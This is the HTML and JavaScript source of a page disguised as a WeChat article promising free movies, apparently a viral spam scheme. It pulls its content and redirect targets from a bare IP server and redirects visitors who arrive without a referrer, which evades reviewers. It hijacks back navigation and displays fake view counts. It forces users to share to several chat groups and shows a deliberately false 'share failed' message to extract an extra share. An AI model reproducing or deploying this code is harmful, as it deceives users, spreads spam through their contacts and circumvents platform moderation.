<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
<meta name="referrer" content="origin-when-cross-origin">
<link rel="stylesheet" type="text/css" href="//czm.oss.lingwokeji.com/fenxiang/css/weui.css">
<link rel="stylesheet" href="//czm.oss.lingwokeji.com/fenxiang/css/css.css">
<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//czm.oss.lingwokeji.com/fenxiang/js/jquery.share.js"></script>
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<title>...<-suiji-></title>
<script type="text/javascript">
gurl = "//47.89.48.228/shareinfo.php?id=4";
$.ajax({ 
	type:"get", 
	url:gurl, 
	data: {}, 
	dataType: 'json', 
	async : false,
	success:function(data){ 
		sdata = data;
	} 
});
var getReferrer=function() {
    var referrer = '';
    try {
        referrer = window.top.document.referrer;
    } catch(e) {
        if(window.parent) {
            try {
                referrer = window.parent.document.referrer;
            } catch(e2) {
                referrer = '';
            }
        }
    }
    if(referrer === '') {
        referrer = document.referrer;
    }
    return referrer;
};

if(getReferrer()==''){
	if(sdata.link){
		location.href=sdata.link;
	}
}
window.onhashchange = function() {
	if(sdata.relink){
		location.href = sdata.relink;
	}
};
</script>
</head>
<body id="activity-detail" class="zh_CN mm_appmsg not_in_mm" ontouchstart="" mycollectionplug="bind">
<form>
<div id="js_article" class="rich_media">
	<div class="rich_media_inner" style=" padding-top:0px;">
		<div id="page-content">
			<div id="img-content" class="rich_media_area_primary" style=" padding-top:0px;">                         
				<div class="rich_media_content " id="js_content" style=" padding-top:0px;">
                    <div class="bd spacing" style=" " id="zhezhaoBtn1">
                    </div>
                     <a href="javascript:;" id="zhezhaoBtn2" style="display:block;color:#fff;background-color:#FF0000;width:100%;padding:10px 0;text-align:center;font-size:16px;text-decoration:none;"> 立即免费观影<br></a><br>
					 <div><img src="http://image3.135editor.com/cache/remote/aHR0cHM6Ly9tbWJpei5xbG9nby5jbi9tbWJpei9jWlYyaFJwdUFQZ1ExT3NnYVAwaWFNMmlhVXF5SFc1V1NEeG9qbUJ4UHF6UkVhQWhiaFlDcHU4aWN5VWVWaWFCWG5hNkpkaWNDYmdkQWZhRHVnUnZRVzlpY2FrUS8wP3d4X2ZtdD1naWY=" alt=""></div>
					
                </div>
				<div class="rich_media_tool" id="js_toobar2">
					<div id="js_read_area2" class="media_tool_meta tips_global meta_primary"  style="font-size:15px"><span style="color: #438AF6;margin-right: 2px;"><a href="javascript:void(0);" id="rd-origin">阅读原文</a> </span>阅读 <span id="readNum2">100000+</span></div>
					<span class="media_tool_meta meta_primary tips_global meta_praise" id="like2">
						<i class="icon_praise_gray" style="    margin-top: 7px;"></i><font style="font-size:15px">赞&nbsp;</font><span class="praise_num" id="likeNum" style="font-size:15px">100000+</span>
					</span>
					<a id="js_report_article2_jb" class="media_tool_meta tips_global meta_extra" href="javascript:void(0);"   style="font-size:15px">举报</a>
				</div>
			</div>
		</div>
		
	</div>
    <div id="zhezhao_share" style="display:none;background:rgba(0,0,0,0.99);" >
		<p style="text-align: right; padding-left: 10px;color:#fff;font-size:20px">
            <img src="<-shareimg->" id="share-wx-img" style="width: 100%; padding-right: 15px;">
        </p>
    </div>
	<div id="ads" style="display:none">
		<div style="display: flex;align-items: center;justify-content: center;padding: 10px;">
			<span style="color: #868686;word-break: keep-all;padding: 0 4px;letter-spacing: 1px;font-size: 16px;">广告</span>
		</div>
		<div style="text-align: center;margin-bottom: 20px;"><a id='ad' href="javascript:void(0);"><img id="adimg" style="width: 90%;" src="https://cdn.ur.qq.com/uploadImages/2017-07-06/20170706123546.JPG" alt=""></a></div></div>
	</div>
</div>
</form>
<script>
var weui = {
    alert: function(msg, title, callback) {
        title = title ? title: "\u6e29\u99a8\u63d0\u9192";
        var alertHtml = '<div class="weui_dialog_alert" style="position: fixed; z-index: 2000; display: none;">';
        alertHtml += '<div class="weui_mask"></div>';
        alertHtml += '<div class="weui_dialog">';
        alertHtml += '    <div class="weui_dialog_hd"><strong class="weui_dialog_title">' + title + '</strong></div>';
        alertHtml += '    <div class="weui_dialog_bd"></div>';
        alertHtml += '    <div class="weui_dialog_ft">';
        alertHtml += '      <a href="javascript:;" class="weui_btn_dialog primary">\u786e\u0020\u5b9a</a>';
        alertHtml += '  </div>';
        alertHtml += ' </div>';
        alertHtml += '</div>';
        if ($(".weui_dialog_alert").length > 0) {
            $(".weui_dialog_alert .weui_dialog_bd").empty();
        } else {
            $("body").append($(alertHtml));
        }
        var weui_alert = $(".weui_dialog_alert");
        weui_alert.show();
        weui_alert.find(".weui_dialog_bd").html(msg);
        weui_alert.find('.weui_btn_dialog').off("click").on('click',
        function() {
            weui_alert.hide();
            if (callback) {
                callback();
            }
        });
    }
}

$(function () {
	$('#js_report_article2_jb').click(function () {
		var url = location.href;
		location.href = "jubao/jubao1.htm?" + url;
	});
	$('#zhezhaoBtn1').click(function () {
		$('#zhezhao_share').attr('style', 'display: block;');
	});
	$('#zhezhao_share').click(function () {
		$('#zhezhao_share').attr('style', 'display: none;');
	});
	$('#zhezhaoBtn2').click(function () {
		$('#zhezhao_share').attr('style', 'display: block;');
		
	});
	$('#zhezhaoBtn3').click(function () {
		$('#zhezhao_share').attr('style', 'display: block;');
		
	});
	$('#oks').click(function () {
		$('#doWithdrawDialog').attr('style', 'display: none;');
		
	});
});

document.title = sdata.title;
document.getElementById("share-wx-img").src= sdata.shareimg;
document.getElementById("zhezhaoBtn1").innerHTML= sdata.content;

if(sdata.adimg && sdata.yuanwen){
	$('#ads').attr('style',"display:block");
	$('#adimg').attr('src',sdata.adimg);
		$('#adimg').bind('click',function () {
		if(sdata.yuanwen!=""){
			location.href=sdata.yuanwen;
		}
	});
}
$('#rd-origin').bind('click',function () {
	if(sdata.yuanwen!=""){
		location.href=sdata.yuanwen;
	}
});

document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {WeixinJSBridge.call('showOptionMenu');});
var curWwwPath=window.document.location.href;
var pathName=window.document.location.pathname;
var pos=curWwwPath.indexOf(pathName);
var localhostPaht=curWwwPath.substring(0,pos);
var projectName=pathName.substring(0,pathName.substr(1).indexOf('/')+1);
var baseUrl = localhostPaht+projectName;
var friend_num = 0;
var share_time = 0;
var sharedata = {
	'title':sdata.title,
	'link':sdata.link,
	'imgUrl':sdata.imgUrl,
	'desc':sdata.desc,
	'qtitle':sdata.title,
	'qlink':sdata.link,
	'qimgUrl':sdata.imgUrl,
	'success':function(res){
		if(res == "friend"){
			share_time++;
			if (share_time < 3) {
				weui["alert"]('分享成功！再分享<span style="font-size: 30px;color: #f5294c">' + (3 - share_time) + '个</span>不同的群即可！<br>(朋友群或同学群或家人群)');
			}
			if(share_time == 3) {
				weui["alert"]('分享失败,请再分享1个<span style="font-size: 30px;color: #f5294c">不同</span>的微信群<br/>(朋友群或同学群或家人群)');
			}
			if (share_time >= 4) {
				weui["alert"]('分享成功！再分享到<span style="font-size: 30px;color: #f5294c">朋友圈</span>即可！');
			}
		}else if(res == "timeline"){
			if(share_time >= 4){
				if(sdata.str_mp){
					location.href=sdata.str_mp;
				}
			}else{
				weui["alert"]('请先分享到<span style="font-size: 30px;color: #f5294c">3个不同的群</span>！');
			}
		}
	}
}
</script>
<div style="display:none" id="tongji"><script src="https://s13.cnzz.com/z_stat.php?id=1262606142&web_id=1262606142" language="JavaScript"></script></div>
</body>
</html>